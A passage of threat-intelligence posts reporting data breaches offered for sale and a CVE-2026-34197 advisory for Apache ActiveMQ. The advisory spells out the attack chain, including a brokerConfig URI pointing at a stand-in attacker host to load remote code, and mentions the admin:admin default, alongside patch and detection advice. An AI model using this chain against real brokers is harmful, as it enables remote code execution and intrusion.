](https://darkwebinformer.com/pricing) 01 ## Incident Summary Date & Time2026-04-20 20:14 UTC Threat ActorRabid VictimChartered Institute of Bankers of Nigeria IndustryBanking / Professional Assoc. CategoryData Breach Total Volume250GB+ ScopeFull Database Sale TypeHidden / Gated Access Sample Hostgofile.io PriceUndisclosed NetworkOpen Web Country Nigeria 02 ## Incident Overview A threat actor going by **Rabid** is advertising the full database of the **Chartered Institute of Bankers of Nigeria (CIBN)**, the country's apex professional body for the banking and finance industry. Established by an Act of the National Assembly, CIBN is responsible for certifying and regulating professional standards for bankers across Nigeria, and its membership spans executives, mid-career professionals, and students pursuing chartered qualifications in the country's financial sector. The dataset being offered totals over **250GB** and is described by the actor as the institute's entire database. According to the listing, the exposed material spans several distinct categories: - **Member Personal Data**Names, email addresses, and full membership records belonging to CIBN members and applicants. - **Identity Documents**Scanned government-issued ID documents submitted during the membership verification process. - **Academic Certificates**University statements of result, degree certificates, and professional membership certificates from institutions including the University of Ilorin, Tansian University, and the Institute of Chartered Accountants of Nigeria (ICAN), shown in the sample. - **Source Code**Platform source code associated with CIBN's online systems, raising the possibility of follow-on attacks against the institute's live infrastructure. - **Operational Documents**Membership details and internal documents bundled within the 250GB archive. The combination of scanned identity documents with matching academic credentials is particularly severe. In the Nigerian financial sector, banker certification documents are a recognised part of know-your-customer and employment verification workflows, and a leaked corpus of genuine ID-plus-certificate pairs provides attackers with ready-made templates for synthetic identity fraud, fake professional impersonation, and targeted business email compromise against the banks where these individuals are employed. The simultaneous exposure of CIBN's source code further compounds the risk, as it may reveal authentication logic, internal endpoints, or hard-coded secrets that could enable a second-stage intrusion. 03 ## Compromised Data Categories Full Names Email Addresses Membership Details Scanned ID Documents University Transcripts Degree Certificates Professional Certificates Platform Source Code Internal Documents 04 ## Screenshots [ ![Forum post by Rabid offering CIBN database leak with institute logo, 250GB volume, and membership data claims](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/879234659872365987623598723549872.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/879234659872365987623598723549872.png) FIG 01 · Forum listing with 250GB database claim [ ![Sample certificates from University of Ilorin, Tansian University, ICAN, and University of Ilorin bachelor's degree included in the CIBN leak sample](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/879234659872365987623598723549873.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/879234659872365987623598723549873.png) FIG 02 · Sample academic and professional certificates _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Global Dining Event Diner en Blanc Breached, 411K Guest Records With Event Details and Invite Codes Listed for Sale URL: https://darkwebinformer.com/global-dining-event-diner-en-blanc-breached-411k-guest-records-with-event-details-and-invite-codes-listed-for-sale/ Last updated: 2026-04-17T20:08:13.000Z Dark Web Informer - Cyber Threat Intelligence # Global Dining Event Diner en Blanc Breached, 411K Guest Records With Event Details and Invite Codes Listed for Sale April 17, 2026 - 10:01:01 PM UTC Canada Events / Hospitality Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-17 22:01:01 UTC Threat Actor 888 Victim Diner en Blanc Industry Events / Hospitality Category Data Breach Total Records 411,000 Scope Global (Six Continents) Sale Type One-Time Exclusive Payment XMR (Monero) Only Price Make Offer Network Open Web Country Canada (Global Events) ## Incident Overview A well-known threat actor going by 888 is selling the database of DinerEnBlanc.com, the platform behind the internationally recognized Diner en Blanc pop-up dining event. Originating in Paris in 1988, Diner en Blanc ("Dinner in White") is a worldwide phenomenon held in over 80 cities across six continents, where thousands of guests dressed in white gather at secret locations for an open-air dinner. The database contains 411,000 unique user records and is being offered as a one-time exclusive sale for Monero only. The breach exposes two distinct datasets. The primary event management database contains the following fields per record: - **Personal Identity**: IDs, first names, last names, and email addresses. - **Event Logistics**: Phase assignments, role designations, invite codes, transportation method, group assignments, and table numbers. These fields reveal the detailed organizational structure of how each event is planned and managed. - **Attendance Status**: VIF (VIP) status flags, new attendee markers, absent flags, incomplete registration markers, personal invitation status, blacklisted flags, cancelled flags, confirmed flags, confirmation status, and reserved status. - **Social Connections**: Partner IDs linking guests to their dining partners, revealing personal relationship data. A separate newsletter/mailing list dataset includes email addresses, first names, last names, subscription tags, subscribed/unsubscribed timestamps, and extra attributes. The value of this data goes beyond typical PII. Diner en Blanc is an invitation-only, culturally exclusive event that attracts affluent, socially connected individuals in major global cities. The guest list effectively functions as a curated directory of high-net-worth and socially prominent individuals across 80+ cities worldwide. The VIF/VIP flags, blacklist status, and invite code structures reveal the internal social hierarchy of the event organization. For social engineers, this is a high-quality targeting list of wealthy individuals with verified social connections, event preferences, and transportation patterns. ## Compromised Data Categories Full Names Email Addresses Invite Codes Event Roles & Phases Transportation Details Table & Group Assignments VIF/VIP Status Blacklist Status Confirmation & Cancellation Status Partner IDs Newsletter Subscriptions & Tags ## Image Preview [![Forum post by 888 selling Diner en Blanc database with 411K records showing DB logo, compromised data fields, and sample records with event management columns](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9872356987236598723569815698732569781.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9872356987236598723569815698732569781.png) [![Newsletter mailing list sample with email, name, tags, and subscription timestamps, plus one-time sale notice with XMR payment and Session contact](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9872356987236598723569815698732569782.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/9872356987236598723569815698732569782.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets the Diner en Blanc event management platform to access the global guest database containing records from events across six continents. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts the complete event management database with 411,000 guest records including personal details, event logistics, VIP status, and partner connections alongside the newsletter mailing list. ](https://attack.mitre.org/techniques/T1213/) [ T1589.002 Gather Victim Identity: Email Addresses Harvests 411,000 email addresses with associated names, event roles, and VIP indicators, creating a curated targeting list of affluent individuals across 80+ global cities. ](https://attack.mitre.org/techniques/T1589/002/) [ T1567 Exfiltration Over Web Service Offers the stolen database as a one-time exclusive sale on forums with payment in Monero only, and contact via PM or Session messaging. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### CVE-2026-34197: 13-Year-Old Apache ActiveMQ RCE via Jolokia API Surfaces for In-the-Wild Attacks URL: https://darkwebinformer.com/cve-2026-34197-13-year-old-apache-activemq-rce-via-jolokia-api-surfaces-for-in-the-wild-attacks/ Last updated: 2026-04-17T17:22:55.000Z KEV Listed · Active Exploitation Confirmed # CVE-2026-34197: 13-Year-Old Apache ActiveMQ RCE via Jolokia API Surfaces for In-the-Wild Attacks A remote code execution flaw hiding in plain sight in Apache ActiveMQ Classic since 2013 allows attackers to weaponize a documented management operation into full broker compromise — now confirmed exploited per CISA KEV. Dark Web Informer April 17, 2026 7 min read CVECVE-2026-34197 ProductApache ActiveMQ Classic (not Artemis) Bug Class[CWE-20](https://cwe.mitre.org/data/definitions/20.html) · [CWE-94](https://cwe.mitre.org/data/definitions/94.html) CVSS 3.18.8 / High VectorAV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H ExploitationActive · Added to CISA KEV Apr 16, 2026 ImpactArbitrary code execution as broker process KEV DeadlineApril 30, 2026 (federal) ReporterNaveen Sunkavally (Horizon3.ai) PoC[github.com/dinosn/CVE-2026-34197](https://github.com/dinosn/CVE-2026-34197) NVD Entry[nvd.nist.gov/vuln/detail/CVE-2026-34197](https://nvd.nist.gov/vuln/detail/CVE-2026-34197) Every so often a vulnerability surfaces that makes you wonder how it survived so long undetected. **CVE-2026-34197** is one of those. It's a remote code execution flaw in Apache ActiveMQ Classic that has been sitting in the codebase for roughly 13 years, quietly reachable through a legitimate management API. It was disclosed in early April 2026, patched by the Apache ActiveMQ project, and — as of April 16, 2026 — [added to CISA's Known Exploited Vulnerabilities catalog](https://thehackernews.com/2026/04/apache-activemq-cve-2026-34197-added-to.html) with active exploitation already reported in the wild. The vulnerability was discovered by **Naveen Sunkavally** of Horizon3.ai, who has publicly described using an AI assistant as part of the audit. The researcher's [technical disclosure](https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/) walks through how a documented broker-to-broker management operation was turned into a one-request path to arbitrary OS command execution. ## How it works ActiveMQ exposes a management interface called Jolokia at `/api/jolokia/`. Jolokia is a JMX-over-HTTP bridge: it lets you call MBean operations on the broker via ordinary HTTP requests. Historically, ActiveMQ had already been burned by a Jolokia-adjacent bug (**CVE-2022-41678**), and a fix tightened which operations were callable. CVE-2026-34197 bypasses the spirit of that earlier fix by going after the ActiveMQ MBeans themselves. One operation on the broker MBean — `addNetworkConnector(String)` — was never meant to be reachable the way it turned out to be. Its intended purpose is to bridge two brokers together at runtime for load distribution and high availability. You hand it a discovery URI, it sets up a network connection. Harmless enough, on paper. The trick is the URI scheme. ActiveMQ supports a "VM transport" written as `vm://`, originally designed for embedding a broker inside an application for unit tests and other in-process use cases. It's a lightweight, intra-JVM transport. But the `vm://` URI accepts a `brokerConfig` parameter that can point to a remote Spring XML configuration file. When Spring loads that XML, it happily instantiates whatever beans it's told to — including beans that call `Runtime.exec()` on arbitrary OS commands. ## The attack chain **Authenticate to Jolokia** — or skip entirely on versions 6.0.0 through 6.1.1, where [CVE-2024-32114](https://nvd.nist.gov/vuln/detail/CVE-2024-32114) exposed the API without authentication. **POST to `/api/jolokia/`** invoking `addNetworkConnector` on the broker MBean. **Supply a `vm://` URI** with `brokerConfig=xbean:http://attacker/evil.xml` pointing to an attacker-controlled Spring config. **Broker fetches the XML**, Spring instantiates malicious beans, and commands execute as the ActiveMQ broker process — full RCE. It's one HTTP request to a documented management endpoint, using a documented operation, with a transport URI that was never supposed to be reachable remotely in the first place. That combination is why this sat unnoticed for over a decade. **The authentication asterisk.** The CVE is officially an authenticated RCE, but `admin:admin` remains the default credential on many ActiveMQ installations and these deployments are a well-documented graveyard of unchanged defaults. On versions 6.0.0 through 6.1.1, chaining with CVE-2024-32114 makes it effectively unauthenticated. ## Disclosure timeline 2013 Vulnerable code introduced in Apache ActiveMQ; `addNetworkConnector` accepts `vm://` transports with remote `brokerConfig`. Nov 2022 Related Jolokia exec vulnerability (CVE-2022-41678) patched; fix tightens callable operations but does not address MBean-level path. Mar 2026 Naveen Sunkavally of Horizon3.ai identifies the MBean path during AI-assisted code audit and reports to Apache. Apr 6 Apache publishes security advisory; ActiveMQ **5.19.4** and **6.2.3** released with fix removing `vm://` from `addNetworkConnector`. Apr 7 Horizon3.ai publishes full technical disclosure with exploitation details and detection guidance. Apr 16 CISA adds CVE-2026-34197 to the KEV catalog, confirming active exploitation; federal patch deadline set for April 30. ## Affected versions and patches The vulnerability affects all Apache ActiveMQ Classic releases in both the 5.x and 6.x branches prior to the fixed versions. Artemis is not affected. Apache has released patched versions that remove `vm://` as an accepted transport for `addNetworkConnector`: Branch Fixed Version ActiveMQ Classic 5.x 5.19.4 ActiveMQ Classic 6.x 6.2.3 All releases before **5.19.4**, and all releases from **6.0.0 through 6.2.2**, are confirmed vulnerable. Versions 6.0.0 through 6.1.1 carry additional risk due to chaining with CVE-2024-32114. ## Why it matters right now ActiveMQ has a history of being weaponized quickly. **CVE-2023-46604**, an OpenWire RCE from late 2023, was picked up for ransomware deployment within weeks of disclosure. So when CISA adds a new ActiveMQ flaw to the KEV catalog citing confirmed in-the-wild exploitation — and SAFE Security separately reports active targeting of exposed Jolokia endpoints — the historical pattern strongly suggests this becomes a broader opportunistic campaign, not a quiet curiosity. A [public proof-of-concept](https://github.com/dinosn/CVE-2026-34197) is now available on GitHub, which meaningfully lowers the skill bar for mass exploitation. The CVSS vector is also about as bad as it gets for a vulnerability labeled "requires privileges": network-reachable, low complexity, no user interaction, and total loss of confidentiality, integrity, and availability on the host. SSVC scoring from CISA marks exploitation as **active** and technical impact as **total**. ## What to do **Patch immediately.** Upgrade ActiveMQ Classic to `5.19.4` or `6.2.3`. The fix removes `vm://` as an accepted transport for `addNetworkConnector` — that operation was never supposed to wire up an in-process transport over the network anyway. **Kill default credentials.** If your broker is still running with `admin:admin`, fix that before anything else. This is good hygiene independent of this CVE and closes the front door used by most opportunistic ActiveMQ attacks. **Lock down Jolokia exposure.** The management API rarely needs to be reachable from general-purpose networks. Put it behind an allowlist, a VPN, or disable it entirely if your deployment doesn't depend on it. **Hunt for indicators.** Search broker logs for network connector activity referencing `vm://` URIs with `brokerConfig=xbean:http`, and for POST requests to `/api/jolokia/` whose bodies contain `addNetworkConnector`. **Watch for post-exploitation.** Monitor for outbound HTTP from the ActiveMQ broker process to unexpected hosts (the fetch of the attacker's XML), and unexpected child processes spawned by the ActiveMQ Java process (the `Runtime.exec()` payload). These catch successful exploitation regardless of how the attacker reached the endpoint. ## Bigger picture The researcher who found this bug publicly described using an AI assistant as part of the hunt. That's a small data point on a larger trend: AI-assisted code review is starting to surface vulnerabilities that have been sitting in widely-used open-source projects for more than a decade. The defensive takeaway isn't really about AI, though — it's that old code with new eyes keeps finding things, and patch cadences need to assume that cycle is speeding up. ActiveMQ remains a common choice for enterprise messaging, IoT data routing, and microservices communication, with deployments across numerous industries including operational technology and critical infrastructure. A pre-authentication-adjacent RCE in that kind of software, triggerable by one HTTP request to a documented endpoint, is exactly the profile that drives both opportunistic scanning and targeted campaigns. The CISA KEV listing is not a warning about a future problem — it is a notification that it has already started. **Patch ActiveMQ. Rotate your defaults. Check your logs.** If your broker is internet-exposed, treat this like a fire drill. Sources: [Horizon3.ai](https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/) · [The Hacker News](https://thehackernews.com/2026/04/apache-activemq-cve-2026-34197-added-to.html) · [Help Net Security](https://www.helpnetsecurity.com/2026/04/09/apache-activemq-rce-vulnerability-cve-2026-34197-claude/) · [Apache ActiveMQ Security Advisory](https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt) · [NIST NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-34197) · [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) · [Public PoC (dinosn)](https://github.com/dinosn/CVE-2026-34197) ### French Basketball Federation Breached, 1.9 Million Members and 800K Parents Exposed With Addresses, Medical Certificates, and Minor Data URL: https://darkwebinformer.com/french-basketball-federation-breached-1-9-million-members-and-800k-parents-exposed-with-addresses-medical-certificates-and-minor-data/ Last updated: 2026-04-17T16:56:51.000Z Dark Web Informer - Cyber Threat Intelligence # French Basketball Federation Breached, 1.9 Million Members and 800K Parents Exposed With Addresses, Medical Certificates, and Minor Data April 17, 2026 - 6:46:08 PM UTC France Sports / Recreation Standalone API Access Now Available High-volume threat-intelligence data, automated ingestion endpoints, ransomware feeds, IOC data, and more. [ View API](https://darkwebinformer.com/api-details/) Unlock Exclusive Cyber Threat Intelligence Powered by DarkWebInformer.com Stay ahead of cyber threats with real-time breach tracking, expert analysis, and high quality evidence - built for security professionals, researchers, journalists, and everyday people who take their privacy seriously. [ Subscribe Now](https://darkwebinformer.com/pricing) ## Quick Facts Date & Time 2026-04-17 18:46:08 UTC Threat Actor HexDex Victim French Basketball Federation (FFBB) Industry Sports / Recreation Category Data Breach Total Members 1,926,409 Parent Records \~800,000 Unique Emails 1,444,527 Unique Phones 1,513,270 Unique Addresses 1,926,409 Price Make Offer Country France ## Incident Overview HexDex, a prolific threat actor previously responsible for the Therapeutes, Airsoft-Entrepot, and Allopneus breaches targeting French organizations, is now selling the personal data of 1,926,409 members and approximately 800,000 parents from the Federation Francaise de Basket-Ball (FFBB), the governing body for basketball in France. The total dataset covers roughly 2.7 million individuals and includes a 5,000-line sample distributed across six file hosting services. The dataset statistics show significant deduplicated contact volumes: 1,444,527 unique member emails, 1,513,270 unique member phones, 468,306 unique landlines, 511,120 unique mother phone numbers, 538,890 unique mother emails, 271,121 unique father phone numbers, and 91,955 unique father emails. Each member record contains an extensive set of fields: - **Personal Identity**: Full names, first names, dates of birth, place of birth, gender, and nationality. - **Contact and Address**: Personal phone numbers, home/landline numbers, email addresses, full street addresses with complement details (apartment floor, building), postal codes, and commune names. - **Federation Data**: Licence numbers, qualification dates, player category codes (U19, U20, Senior), league/division classifications, regional league identifiers (IDF, ARA, BRE, CVL), and club affiliations with organization names and codes. - **Medical Information**: Medical certificate dates and medical certificate expiration dates, which confirm whether a player has a current health clearance to compete. - **Physical Data**: Height measurements in meters for individual players. - **Club and Organization**: Club SIRET numbers (French business registration), club organization codes, prefecture registration numbers, and club names. - **Consent and Authorization**: FFBB offer authorization status, partner authorization status, and engagement charter flags. - **Parent Data**: For minor players, the dataset includes mother and father email addresses, phone numbers, and contact details as separate fields. The child safety dimension of this breach is critical. The sample data shows records for individuals born in 2003, 2004, 2005, and 2007, many in the U19 and U20 categories. For these minor and recently-adult players, the database exposes not only their personal information but also their parents' contact details, their home addresses, their club locations, and their physical height. The medical certificate data adds a health information dimension that may trigger additional GDPR and French health data protection requirements. ## Compromised Data Categories Full Names & Dates of Birth Home Addresses Personal & Home Phone Numbers Email Addresses Licence Numbers Medical Certificate Dates Height / Physical Data Nationality Club Affiliations & SIRET Numbers Player Categories & Divisions Prefecture Registration Numbers Parent Contact Details (\~800K) Minor Player Records ## Image Preview [![Forum post by HexDex selling 1.9 million FFBB member records and 800K parent records with FFBB logo, contact statistics, and proof links](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/239786598723459876125987612987451.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/239786598723459876125987612987451.png) [![Sample JSON records showing detailed member profiles with addresses, licence numbers, medical certificates, club details, and parent contact information for minor players](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/239786598723459876125987612987452.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/239786598723459876125987612987452.png) [![Additional sample records, 5K line sample download links across six file hosts, qTox and Session contact details, and link to actor's full data sales listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/239786598723459876125987612987453.png)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/239786598723459876125987612987453.png) ## Claim URL Subscriber Access Required The original listing URL and unredacted claim images are available on the Threat Feed and Ransomware Feed for paid subscribers. [ Subscribe](https://darkwebinformer.com/pricing) Subscriber Access View the original listing URL and unredacted claim images on the feeds below. [ Threat Feed](https://darkwebinformer.com/threat-feed/) [ Ransomware Feed](https://darkwebinformer.com/ransomware-feed) ## MITRE ATT&CK Mapping [ T1190 Exploit Public-Facing Application Targets the French Basketball Federation's web infrastructure to access member databases containing nearly 2 million player records and 800,000 parent records. ](https://attack.mitre.org/techniques/T1190/) [ T1213 Data from Information Repositories Extracts the complete federation membership database including personal details, licence data, medical certificates, club affiliations, and family contact information. ](https://attack.mitre.org/techniques/T1213/) [ T1589.002 Gather Victim Identity: Email Addresses Harvests 1.4 million unique member emails, 538,890 mother emails, and 91,955 father emails alongside verified phone numbers for targeted phishing and social engineering. ](https://attack.mitre.org/techniques/T1589/002/) [ T1567 Exfiltration Over Web Service Distributes a 5,000-line sample across six file hosting services and offers the full dataset via qTox and Session messaging for buyer negotiations. ](https://attack.mitre.org/techniques/T1567/) Dark Web Informer © 2026 | Cyber Threat Intelligence [DarkWebInformer.com](https://darkwebinformer.com/) ### Daily Dose of Dark Web Informer - April 15th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-april-15th-2026/ Last updated: 2026-04-15T22:01:10.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence ❗️ [(Yesterday) Moroccan Biomedical School SUPTECH SANTE Breached, 231 Student Dossiers With National IDs, Diplomas, and ID Card Photos Exposed](#) FREE ❗️ [(Yesterday) France's National ID Agency ANTS Allegedly Breached, 18 Million Citizen Records With Government-Verified Identities Listed for Sale](#) FREE X/Twitter Updates ❗️ [The dataset of the Instituto Tecnologico de Cintalapa, a public technology institute in Chiapas, Mexico, has allegedly been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2044424698453234168?s=20) ❗️ [A threat actor operating under the PF community claims to have exploited a myBB vulnerability on DarkForums to extract approximately 427,000 records linking post IDs to usernames, IP addresses, and hostnames.](https://x.com/DarkWebInformer/status/2044427534821892134?s=20) ❗️ [The young hacker behind the historic PowerSchool breach, Matthew Lane, speaks out for the first time just days before beginning a four-year federal prison sentence, as experts warn of a new generation of tech-savvy teenagers falling into cybercrime.](https://x.com/DarkWebInformer/status/2044435230879080652?s=20) ❗️ [A threat actor operating under the alias SiberSLX has publicly leaked a ZIP archive purportedly containing sensitive data related to Iran's Ministry of Intelligence (MOIS/VEVAK), including information allegedly connected to intelligence, nuclear, military, and leadership.](https://x.com/DarkWebInformer/status/2044440327004520498?s=20) ❗️ [PwnForums is currently offline.](https://x.com/DarkWebInformer/status/2044442650367939048?s=20) ❗️ [Cognizant has been claimed a victim to Coinbasecartel Ransomware.](https://x.com/DarkWebInformer/status/2044443625673642151?s=20) ❗️ [Iraq's 2025-2026 census data containing nearly 48 million records has allegedly been breached and is being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2044448001175744891?s=20) 💡 [Anthropic's Claude AI now requires government ID verification (via Persona) for some users when accessing certain advanced features or when triggered by safety and compliance checks.](https://x.com/DarkWebInformer/status/2044449609880044003?s=20) ❗️ [Autovista is currently responding to a Ransomware incident.](https://x.com/DarkWebInformer/status/2044451579001033248?s=20) 💡 [I am working on the threat feed, a couple forums decided to change things up because they are at war with one another.](https://x.com/DarkWebInformer/status/2044475836397441235?s=20) 💡 [.@vectrw and @pcpcats are going nutty right now.](https://x.com/DarkWebInformer/status/2044483751787307190?s=20) ❗️ [Threat actor Lvn4t1k0 claims to have leaked the complete database of Universidad Latina de México containing user credentials, emails, and personal information.](https://x.com/DarkWebInformer/status/2044502009517056387?s=20) ❗️ [A threat actor shared a dataset containing personal information of Royal Palace staff in Morocco, including names, birth dates, addresses, national ID numbers, and recruitment dates.](https://x.com/DarkWebInformer/status/2044502738977870208?s=20) ❗️ [The personal data of 682,662 members of the Brit Hotel loyalty program, a French hotel chain with over 180 locations, is allegedly being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2044504028751487324?s=20) 💡 [Bro is claiming Archetyp Market vendor data from April 2026, when the market was seized in June of 2025.](https://x.com/DarkWebInformer/status/2044506307152024063?s=20) ❗️ [Actor SiberSLX claims to have leaked sensitive coordinates and information about German intelligence agencies (BND, BfV, MAD) and critical infrastructure locations.](https://x.com/DarkWebInformer/status/2044509562888131032?s=20) ❗️ [Clearwater Marine Aquarium has been claimed a victim to Qilin Ransomware.](https://x.com/DarkWebInformer/status/2044517025943273738?s=20) ❗️ [Threat actor Infector is recruiting experienced penetration testers to join a private team for privilege escalation activities within their networks.](https://x.com/DarkWebInformer/status/2044518914646843853?s=20) 💡 [One forum is having broken screenshot issues, nothing I can really do, it's the forum having issues... you can see the same problem in your own browser.](https://x.com/DarkWebInformer/status/2044519858453233675?s=20) 💡 [Someone registered the following LeakBase domain.](https://x.com/DarkWebInformer/status/2044523839053312234?s=20) 💡 [How many of you vibe code... be honest. Yes, I'm guilty but not near 100%.](https://x.com/DarkWebInformer/status/2044526932910321830?s=20) 💡 [The leader.](https://x.com/DarkWebInformer/status/2044532215392936177?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Daily Dose of Dark Web Informer - April 14th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-april-14th-2026/ Last updated: 2026-04-14T22:31:02.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Moroccan Biomedical School SUPTECH SANTE Breached, 231 Student Dossiers With National IDs, Diplomas, and ID Card Photos Exposed](#) FREE ❗️ [France's National ID Agency ANTS Allegedly Breached, 18 Million Citizen Records With Government-Verified Identities Listed for Sale](#) FREE X/Twitter Updates ❗️ [The IRGC (Islamic Revolutionary Guard Corps) surveillance system and Iranian police database have allegedly been leaked and posted for free download on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2044055340849799583?s=20) ❗️ [MAJOR CLAIM: Threat actors claim to have achieved total persistence within Venezuela's National Electric System (SEN) operated by CORPOELEC, seizing direct SCADA control over critical infrastructure.](https://x.com/DarkWebInformer/status/2044058810457719091?s=20) ❗️ [A dump of emails and passwords associated with Farmacias del Ahorro MX, one of Mexico's largest pharmacy chains, has allegedly been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2044063370286895477?s=20) ❗️ [The ransomware group "TheGentlemen" has listed an unnamed major global manufacturer on their leak site.](https://x.com/DarkWebInformer/status/2044065493602951603?s=20) ❗️ [The personal data of 598,154 members of the Logis Hotels ETIK loyalty program, covering bookings from 2012 to 2026, is allegedly being sold on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2044068712110588114?s=20) ❗️ [A credential dump from Telmex MX, Mexico's largest telecommunications company, has allegedly been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2044071393369698468?s=20) ❗️ [The dataset of the Spanish Wind Energy Association (AEE / Asociacion Empresarial Eolica), the voice of Spain's wind energy sector, has allegedly been leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2044073493243764749?s=20) ❗️ [Approximately 25 million documents have allegedly been exfiltrated from the infrastructure of the Corporate Affairs Commission (CAC) of Nigeria, the government agency responsible for company registrations.](https://x.com/DarkWebInformer/status/2044076878047146027?s=20) ❗️ [Threat actor jza1337 claims to possess a Zadig & Voltaire customer database containing over 500,000 records with first name, last name, email, and gender information.](https://x.com/DarkWebInformer/status/2044080183938781546?s=20) 💡 [Facts. Your PGP key is literally like having a Passport or any other sensitive ID, so keep it safe and stop sharing with others.](https://x.com/DarkWebInformer/status/2044090293150978083?s=20) ❗️ [CVE-2025-58434 and CVE-2025-59528: Flowise Dual CVE PoC](https://x.com/DarkWebInformer/status/2044096903944478842?s=20) ❗️ [An iOS exploit and C2 integrated attack panel called "iExploit Lab v1.0" is being advertised on a popular cybercrime forum, targeting iOS 13 through iOS 17.2.1 for $15,000.](https://x.com/DarkWebInformer/status/2044103719650824357?s=20) ❗️ [McGraw-Hill confirmed to BleepingComputer a data breach, following an extortion threat](https://x.com/DarkWebInformer/status/2044116775416000916?s=20) ❗️ [DarkForums now offers a free XMPP chat server for the 